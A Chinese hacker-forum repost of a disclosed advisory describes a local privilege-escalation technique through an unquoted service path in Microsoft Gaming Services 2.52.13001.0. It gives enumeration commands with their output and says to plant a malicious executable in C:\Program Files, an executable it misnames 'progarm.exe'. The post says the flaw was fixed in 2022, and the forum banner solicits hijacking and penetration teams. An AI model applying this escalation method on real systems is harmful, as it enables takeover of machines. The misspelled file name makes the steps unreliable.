跳转到帖子
诚邀seo站长,短信,劫持,渗透,代理,推广团队,博主,主播,各种资源流量大佬合作共赢【站外广告】

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

Microsoft Gaming Services 2.52.13001.0 - Unquoted Service Path

HACK1949
HACK1949
黑帽漏洞数据库

精选回复

发布于 
# Exploit Title: Microsoft Gaming Services 2.52.13001.0 - Unquoted Service Path
# Discovery by: Johto Robbie
# Discovery Date: May 12, 2021
# Tested Version: 2.52.13001.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 x64 Home

# Step to discover Unquoted Service Path:

Go to Start and type cmd. Enter the following command and press Enter:

C:\Users\Bang's>wmic service get name, displayname, pathname, startmode |
findstr /i "Auto" | findstr /i /v "C:\Windows\" | findstr /i /v """

Gaming Services
        GamingServices           C:\Program
Files\WindowsApps\Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe\GamingServices.exe



                                                                        Auto

Gaming Services
        GamingServicesNet        C:\Program
Files\WindowsApps\Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe\GamingServicesNet.exe



                                                                     Auto

C:\Users\Bang's>sc qc "GamingServices"

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: GamingServices

        TYPE               : 210  WIN32_PACKAGED_PROCESS

        START_TYPE         : 2   AUTO_START

        ERROR_CONTROL      : 0   IGNORE

        BINARY_PATH_NAME   : C:\Program
Files\WindowsApps\Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe\GamingServices.exe

        LOAD_ORDER_GROUP   :

        TAG                : 0

        DISPLAY_NAME       : Gaming Services

        DEPENDENCIES       : staterepository

        SERVICE_START_NAME : LocalSystem

This application have no quote . And it contained in C:\Program Files. Put
mot malicious aplication with name "progarm.exe"

Stop & Start: GamingServices. "progarm.exe" will be execute

#Exploit:

An unquoted service path in
Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe, could lead to
privilege escalation during the installation process that is performed when
an executable file is registered. This could further lead to complete
compromise of confidentiality, Integrity and Availability.

#Timeline
May 12, 2021 - Reported to Microsoft
Feb 11, 2022 - Confirmed vulnerability has been fixed

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。